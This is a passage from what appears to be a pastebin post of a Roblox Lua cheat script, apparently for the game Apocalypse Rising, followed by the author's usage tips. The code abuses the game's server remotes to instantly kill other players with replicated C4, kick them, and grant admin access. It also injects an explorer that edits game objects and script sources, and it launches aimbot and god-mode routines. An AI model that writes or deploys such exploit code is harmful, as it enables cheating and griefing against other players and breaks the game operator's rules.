  3117. game.Lighting.Remote.SendMessage:FireServer(v, "Green", ""..name)
  3118. end
  3119. elseif #t.Text > 3 and t.Text:sub(1,8) == "explode/" then -- instakill
  3120. local name = playername(t.Text:sub(9)).Name
  3121. game.Lighting.Remote.PlaceMaterial:FireServer(game.Lighting.Materials.C4Placed, game.Players.LocalPlayer.Character.Torso.Position, true)
  3122. wait(1)
  3123. game.Lighting.Remote.ReplicateModel:FireServer(game.Workspace.C4Placed, game.Players[name].Character.Head.CFrame)
  3124. elseif t.Text == "nofog" then -- vehicle teleport
  3125. game.Lighting.FogEnd = 9999999
  3126. elseif #t.Text > 3 and t.Text:sub(1,5) == "kick/" then -- kick
  3127. game.Lighting.Remote.Destruct:FireServer(playername(t.Text:sub(6)))
  3128. elseif #t.Text > 2 and t.Text:sub(1, 2) == "a/" then -- hax into apoc admin system
  3129. giveAdminGui(playername(t.Text:sub(3)))
  3130. wait(20)
  3131. game.Players.LocalPlayer.PlayerGui.Bunny:children()[1].Spawn2.Visible = true
  3132. end
  3133. end)()
  3134. end
  3135. t.BackgroundTransparency = 1
  3136. t.TextTransparency = 1
  3137. t.Text = ""
  3138. i.ImageTransparency = 1
  3139. i.BackgroundTransparency = 1
  3140. end)
  3141.  
  3142. game.Players.LocalPlayer:GetMouse().KeyDown:connect(function(Key)
  3143. if Key == ";" then
  3144. t.BackgroundTransparency = 0
  3145. i.ImageTransparency = 0
  3146. i.BackgroundTransparency = 0
  3147. t.TextTransparency = 0
  3148. t:CaptureFocus()
  3149. end
  3150. end)
  3151. end
  3152.  
  3153. function explorer()
  3154. TextProperties = {"ClassName", "Name", "Value", "Text", "Reflectance", "Transparency", "Heat", "TeamName", "WalkSpeed", "Health", "MaxHealth", "Size", "Position", "AccountAge", "RobloxLocked", "TeamColor", "userId", "Brightness", "Ambient", "TimeOfDay", "FieldOfView", "CameraType", "LinkedSource"}
  3155. BoolProperties = {"Anchored", "CanCollide", "Disabled", "Jump", "Sit", "Visible", "Enabled", "Locked", "FilteringEnabled", "StreamingEnabled", "GlobalShadows"}
  3156. BrickColorProperties = {"BrickColor", "Color", "TeamColor", "Texture", "Value"}
  3157. s = Instance.new("ScreenGui", game.CoreGui)
  3158. pgr = Instance.new("TextButton")
  3159. pgr.Parent = s
  3160. pgr.Size = UDim2.new(0,100,0,40)
  3161. pgr.Position = UDim2.new(0,30,0,440)
  3162. pgr.Text="Explorer"
  3163. pgr.BackgroundTransparency = 0.3
  3164. pgr.TextColor = BrickColor.new("White")
  3165. pgr.BackgroundColor = BrickColor.new("Really Black")
  3166. pgr.BorderColor = BrickColor.new("Black")
  3167. pgr.Font = "ArialBold"
  3168. pgr.FontSize = "Size14"
  3169. pgr.TextStrokeColor3 = Color3.new(0/0,0/0,0/0)
  3170. pgr.TextStrokeTransparency = 0.3
  3171. pgr.BorderSizePixel = 1
  3172. pgr.BorderColor = BrickColor.new("White")
  3173.  
  3174. if game.CoreGui:findFirstChild("Explorer") then
  3175. game.CoreGui:findFirstChild("Explorer"):Remove()
  3176. end
  3177.  
  3178. local Cloned
  3179. local Deleted
  3180. local DeleteParent
  3181. local Player
  3182. local Search
  3183. local ScriptSearch
  3184. local Gui
  3185. local Cloned = nil
  3186. local Deleted = nil
  3187. local DeleteParent = nil
  3188. local Current = 0
  3189. local CurrentOption = 0
  3190.  
  3191. function Clear()
  3192. if Gui then
  3193. Gui:Remove()
  3194. end
  3195. Current = 0
  3196. CurrentOption = 0
  3197. end
  3198.  
  3199. function AddButton(N, Function, Color, Copy)
  3200. if not N then
  3201. error("RenderButton - No Name Specified")
  3202. end
  3203. if not Function then
  3204. error("RenderButton - No Function Specified")
  3205. end
  3206. if not Color then
  3207. Color = Color3.new(1, 1, 1)
  3208. end
  3209. if Copy == nil then
  3210. Copy = true
  3211. end
  3212. P = Instance.new("TextButton")
  3213. if Copy then
  3214. P.Size = UDim2.new(0, 110, 0, 20)
  3215. else
  3216. P.Size = UDim2.new(0, 130, 0, 20)
  3217. end
  3218. P.Text = N.Name
  3219. P.Name = N.Name
  3220. P.Parent = Gui
  3221. P.BackgroundColor3 = Color
  3222. P.TextColor3 = Color3.new(0, 0, 0)
  3223. P.BackgroundTransparency = 0.5
  3224. P.Position = UDim2.new(0, ((math.modf(Current/30))*150)+300, 0, 50+(20*((Current%30)-1)))
  3225. P.MouseButton1Click:connect(function()
  3226. Function(P)
  3227. end)
  3228. D = Instance.new("TextButton")
  3229. D.Size = UDim2.new(0, 20, 0, 20)
  3230. D.Text = "X"
  3231. D.Name = N.Name
  3232. D.Parent = Gui
  3233. D.BackgroundColor3 = Color3.new(1, 0, 0)
  3234. D.TextColor3 = Color3.new(0, 0, 0)
  3235. D.BackgroundTransparency = 0.5
  3236. D.Position = UDim2.new(0, ((math.modf(Current/30))*150)+300+130, 0, 50+(20*((Current%30)-1)))
  3237. D.MouseButton1Click:connect(function()
  3238. Deleted = N
  3239. DeleteParent = N.Parent
  3240. N.Parent = nil
  3241. Clear()
  3242. Search(DeleteParent)
  3243. end)
  3244. if Copy then
  3245. C = Instance.new("TextButton")
  3246. C.Size = UDim2.new(0, 20, 0, 20)
  3247. C.Text = "C"
  3248. C.Name = N.Name
  3249. C.Parent = Gui
  3250. C.BackgroundColor3 = Color3.new(0, 1, 0.5)
  3251. C.TextColor3 = Color3.new(0, 0, 0)
  3252. C.BackgroundTransparency = 0.5
  3253. C.Position = UDim2.new(0, ((math.modf(Current/30))*150)+300+110, 0, 50+(20*((Current%30)-1)))
  3254. C.MouseButton1Click:connect(function()
  3255. Cloned = N
  3256. Clear()
  3257. Search(N.Parent)
  3258. end)
  3259. end
  3260. Current = Current + 1
  3261. return P
  3262. end
  3263.  
  3264. function AddOption(N, Function, Color, Text)
  3265. if not N then
  3266. error("RenderButton - No Name Specified")
  3267. end
  3268. if not Color then
  3269. Color = Color3.new(1, 1, 1)
  3270. end
  3271. if Text == nil then
  3272. Text = false
  3273. end
  3274. if Text then
  3275. P = Instance.new("TextBox")
  3276. else
  3277. P = Instance.new("TextButton")
  3278. end
  3279. P.Text = N
  3280. P.Name = N
  3281. P.Parent = Gui
  3282. P.BackgroundColor3 = Color
  3283. P.TextColor3 = Color3.new(0, 0, 0)
  3284. P.BackgroundTransparency = 0.5
  3285. P.Size = UDim2.new(0, 150, 0, 20)
  3286. P.Position = UDim2.new(0, ((math.modf(CurrentOption/30))*150)+150, 0, 50+(20*((CurrentOption%30)-1)))
  3287. if not Text and Function then
  3288. P.MouseButton1Click:connect(function() Function(P) end)
  3289. end
  3290. CurrentOption = CurrentOption + 1
  3291. return P
  3292. end
  3293.  
  3294. function AddTextOption(Obj, Prop)
  3295. local Ob = Obj
  3296. local Pro = Prop
  3297. if type(Ob[Pro]) == "number" or type(Ob[Pro]) == "string" then
  3298. CurrentOption = CurrentOption + 1
  3299. local T = AddOption(Ob[Pro], nil, Color3.new(0.1, 0.4, 0.1), true)
  3300. CurrentOption = CurrentOption - 2
  3301. local O = AddOption("Change "..Pro..":", function() Ob[Pro] = T.Text end, Color3.new(0.1, 0.8, 0.1), false)
  3302. CurrentOption = CurrentOption + 1
  3303. end
  3304. end
  3305.  
  3306. function AddBrickColorOption(Obj, Prop)
  3307. local Ob = Obj
  3308. local Pro = Prop
  3309. if BrickColor.new(tostring(Ob[Pro])) == Ob[Pro] then
  3310. CurrentOption = CurrentOption + 1
  3311. local T = AddOption(tostring(Ob[Pro]), nil, Color3.new(0.1, 0.4, 0.1), true)
  3312. CurrentOption = CurrentOption - 2
  3313. local O = AddOption("Change "..Pro..":", function() Ob[Pro] = BrickColor.new(T.Text) end, Color3.new(0.1, 0.8, 0.1), false)
  3314. CurrentOption = CurrentOption + 1
  3315. end
  3316. end
  3317.  
  3318. function AddBoolOption(Obj, Prop)
  3319. local Ob = Obj
  3320. local Pro = Prop
  3321. if type(Ob[Pro]) == "boolean" then
  3322. local O = AddOption(Pro..": "..tostring(Ob[Pro]), nil, Color3.new(0.1, 0.8, 0.1), false)
  3323. O.MouseButton1Click:connect(function()
  3324. if Ob[Pro] then
  3325. Ob[Pro] = false
  3326. O.Text = Pro..": false"
  3327. else
  3328. Ob[Pro] = true
  3329. O.Text = Pro..": true"
  3330. end
  3331. end)
  3332. end
  3333. end
  3334.  
  3335. function TestProperty(Obj, Property)
  3336. Success = pcall(function()
  3337. if Obj[Property] then
  3338. return
  3339. end
  3340. end)
  3341. return Success
  3342. end
  3343.  
  3344. function LoadOptions(Object)
  3345. for Num, Prop in pairs(TextProperties) do
  3346. if TestProperty(Object, Prop) then
  3347. AddTextOption(Object, Prop)
  3348. end
  3349. end
  3350. for Num, Prop in pairs(BoolProperties) do
  3351. if TestProperty(Object, Prop) then
  3352. AddBoolOption(Object, Prop)
  3353. end
  3354. end
  3355. for Num, Prop in pairs(BrickColorProperties) do
  3356. if TestProperty(Object, Prop) then
  3357. AddBrickColorOption(Object, Prop)
  3358. end
  3359. end
  3360. end
  3361.  
  3362. function Search(Object)
  3363. Gui = Instance.new("ScreenGui")
  3364. Gui.Parent = game.CoreGui
  3365. Gui.Name = "Explorer"
  3366. if Object ~= game then
  3367. AddOption("Back", function()
  3368. Clear();
  3369. Search(Object.Parent)
  3370. end, Color3.new(0.5, 1, 1), false)
  3371. end
  3372. AddOption("Reload", function() Clear(); Search(Object); end, Color3.new(0.2, 1, 0.2), false)
  3373. if Cloned then
  3374. AddOption("Paste", function() Cloned:Clone().Parent = Object; Clear(); Search(Object); end, Color3.new(0.5, 1, 1), false)
  3375. end
  3376. if Deleted then
  3377. AddOption("Undo", function() Deleted.Parent = DeleteParent; Deleted = nil; DeletedParent = nil; Clear(); Search(Object); end, Color3.new(1, 0.6, 0.1), false)
  3378. end
  3379. if Object:IsA("Player") then
  3380. AddOption("Goto Character", function() Clear(); if Object.Character then Search(Object.Character); end end, Color3.new(1, 1, 1), false)
  3381. end
  3382. if Object:IsA("LocalScript") then
  3383. AddOption("EditScript", function() Clear(); ScriptSearch(Object); end, Color3.new(1, 1, 1), false)
  3384. end
  3385. if Object:IsA("Terrain") then
  3386. AddOption("Clear", function() Object:Clear(); end, Color3.new(1, 1, 1), false)
  3387. end
  3388. LoadOptions(Object)
  3389. AddOption("Close", Clear, Color3.new(1, 0.2, 0), false)
  3390. if not Object:IsA("Workspace") or not Object:IsA("Player") then
  3391. for Num, Obj in pairs(Object:GetChildren()) do
  3392. --if not Obj:IsA("BasePart") or not Object.Parent == game.Workspace then
  3393. if true then
  3394. if Obj:IsA("LocalScript") then
  3395. AddButton(Obj, function() Clear(); Search(Obj); end, Color3.new(1, 0, 0), true)
  3396. elseif Obj:IsA("Script") or Obj:IsA("StarterScript") or Obj:IsA("CoreScript") then
  3397. AddButton(Obj, function() Clear(); Search(Obj); end, Color3.new(0.5, 0.5, 0.8), true)
  3398. elseif Obj.Parent == game then
  3399. AddButton(Obj, function() Clear(); Search(Obj); end, Color3.new(1, 1, 1), false)
  3400. else
  3401. AddButton(Obj, function() Clear(); Search(Obj); end, Color3.new(1, 1, 1), true)
  3402. end
  3403. end
  3404. end
  3405. end
  3406. function MoveUp(Place, Amount)
  3407. for i,v in pairs(Place:GetChildren()) do
  3408. if v:IsA("TextLabel") or v:IsA("TextBox") then
  3409. v.Position = v.Position + UDim2.new(0,0,0,-Amount)
  3410. end
  3411. end
  3412. end
  3413. function MoveDown(Place, Amount)
  3414. for i,v in pairs(Place:GetChildren()) do
  3415. if v:IsA("TextLabel") or v:IsA("TextBox") then
  3416. v.Position = v.Position + UDim2.new(0,0,0,Amount)
  3417. end
  3418. end
  3419. end
  3420. i=0
  3421. function ScriptSearch(S)
  3422. Script2 = S
  3423. Script = Script2.Source
  3424. Table = {}
  3425. Enabled = true
  3426. Gui = Instance.new("ScreenGui")
  3427. Gui.Parent = game.CoreGui
  3428. Gui.Name = "Explorer"
  3429. while Enabled do
  3430. Start, End = string.find(Script, '\n')
  3431. print(Start, End)
  3432. if Start and End then
  3433. table.insert(Table, string.sub(Script, 1, End))
  3434. New = string.sub(Script, End+1, string.len(Script))
  3435. Script = New
  3436. else
  3437. Enabled = false
  3438. table.insert(Table, string.sub(Script, 1, End))
  3439. print("Finished")
  3440. end
  3441. end
  3442. P = Instance.new("TextLabel")
  3443. P.Size = UDim2.new(0, 500, 0, 20)
  3444. P.Text = Script2.Name
  3445. P.Name = "Script Line"
  3446. P.Parent = Gui
  3447. P.BackgroundColor3 = Color3.new(1, 1, 1)
  3448. P.TextColor3 = Color3.new(0, 0, 0)
  3449. P.BackgroundTransparency = 0.5
  3450. P.Position = UDim2.new(0.5, -250, 0, 150+(20*(i-1)))
  3451. P.TextXAlignment = "Left"
  3452. i=i+1
  3453. New = {}
  3454. for I,Val in pairs(Table) do
  3455. print(Val)
  3456. P = Instance.new("TextBox")
  3457. P.ClearTextOnFocus = false
  3458. P.Size = UDim2.new(0, 500, 0, 20)
  3459. P.Text = Val
  3460. P.Name = "Script Line"
  3461. P.Parent = Gui
  3462. P.BackgroundColor3 = Color3.new(1, 1, 1)
  3463. P.TextColor3 = Color3.new(0, 0, 0)
  3464. P.BackgroundTransparency = 0.5
  3465. P.Position = UDim2.new(0.5, -250, 0, 150+(20*(i-1)))
  3466. P.TextXAlignment = "Left"
  3467. table.insert(New, P)
  3468. i=i+1
  3469. end
  3470. i=1
  3471. P = Instance.new("TextButton")
  3472. P.Size = UDim2.new(0, 20, 0, 20)
  3473. P.Text = "^"
  3474. P.Name = "Scroll"
  3475. P.Parent = Gui
  3476. P.BackgroundColor3 = Color3.new(1, 1, 1)
  3477. P.TextColor3 = Color3.new(0, 0, 0)
  3478. P.BackgroundTransparency = 0.5
  3479. P.Position = UDim2.new(0.5, -270, 0, 150+(20*(i-1)))
  3480. P.MouseButton1Click:connect(function()
  3481. MoveUp(Gui, -20)
  3482. end)
  3483. i=i+1
  3484. P = Instance.new("TextButton")
  3485. P.Size = UDim2.new(0, 20, 0, 20)
  3486. P.Text = "v"
  3487. P.Name = "Scroll"
  3488. P.Parent = Gui
  3489. P.BackgroundColor3 = Color3.new(1, 1, 1)
  3490. P.TextColor3 = Color3.new(0, 0, 0)
  3491. P.BackgroundTransparency = 0.5
  3492. P.Position = UDim2.new(0.5, -270, 0, 150+(20*(i-1)))
  3493. P.MouseButton1Click:connect(function()
  3494. MoveDown(Gui, -20)
  3495. end)
  3496. i=i+1
  3497. P = Instance.new("TextButton")
  3498. P.Size = UDim2.new(0, 20, 0, 20)
  3499. P.Text = "^^"
  3500. P.Name = "Scroll"
  3501. P.Parent = Gui
  3502. P.BackgroundColor3 = Color3.new(1, 1, 1)
  3503. P.TextColor3 = Color3.new(0, 0, 0)
  3504. P.BackgroundTransparency = 0.5
  3505. P.Position = UDim2.new(0.5, -270, 0, 150+(20*(i-1)))
  3506. P.MouseButton1Click:connect(function()
  3507. MoveUp(Gui, -200)
  3508. end)
  3509. i=i+1
  3510. P = Instance.new("TextButton")
  3511. P.Size = UDim2.new(0, 20, 0, 20)
  3512. P.Text = "vv"
  3513. P.Name = "Scroll"
  3514. P.Parent = Gui
  3515. P.BackgroundColor3 = Color3.new(1, 1, 1)
  3516. P.TextColor3 = Color3.new(0, 0, 0)
  3517. P.BackgroundTransparency = 0.5
  3518. P.Position = UDim2.new(0.5, -270, 0, 150+(20*(i-1)))
  3519. P.MouseButton1Click:connect(function()
  3520. MoveDown(Gui, -200)
  3521. end)
  3522. i=i+1
  3523. P = Instance.new("TextButton")
  3524. P.Size = UDim2.new(0, 20, 0, 20)
  3525. P.Text = "S"
  3526. P.Name = "Save"
  3527. P.Parent = Gui
  3528. P.BackgroundColor3 = Color3.new(0, 1, 0)
  3529. P.TextColor3 = Color3.new(0, 0, 0)
  3530. P.BackgroundTransparency = 0.5
  3531. P.Position = UDim2.new(0.5, -270, 0, 150+(20*(i-1)))
  3532. P.MouseButton1Click:connect(function()
  3533. StringS = ""
  3534. for Num, Obj in pairs(New) do
  3535. StringS = StringS..Obj.Text..'\n'
  3536. end
  3537. S.Source = StringS
  3538. S.Disabled = true
  3539. S.Disabled = false
  3540. end)
  3541. i=i+1
  3542. P = Instance.new("TextButton")
  3543. P.Size = UDim2.new(0, 20, 0, 20)
  3544. P.Text = "x"
  3545. P.Name = "Back"
  3546. P.Parent = Gui
  3547. P.BackgroundColor3 = Color3.new(1, 0.2, 0)
  3548. P.TextColor3 = Color3.new(0, 0, 0)
  3549. P.BackgroundTransparency = 0.5
  3550. P.Position = UDim2.new(0.5, -270, 0, 150+(20*(i-1)))
  3551. P.MouseButton1Click:connect(function()
  3552. Clear()
  3553. i=0
  3554. Search(S)
  3555. end)
  3556. i=i+1
  3557. end
  3558. end
  3559.  
  3560. pgr.MouseButton1Click:connect(function()
  3561. Clear()
  3562. Search(game)
  3563. end)
  3564. end
  3565.  
  3566. hills()
  3567. aimbot()
  3568. secondgod()
  3569. spawner()
  3570. justice()
  3571. explorer()
  3572.  
  3573.  
  3574.  
  3575. print("All Set")
  3576.  
  3577. Use the aimbot with left alt
  3578.  
  3579. You can read the hills commands in the actual script, key is ;
  3580.  
  3581. Once you god yourself with the hills gui, use the transparent gui on the left and enable god for a faster loopheal
  3582.  
  3583. I use the justice gui (gray gui on the left side) to spawn car repair kits (local)
  3584.  
  3585. I use the explorer to change the cars max armor and speed in game.Workspace.Vehicles
  3586. How does the aimbot feature work?
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement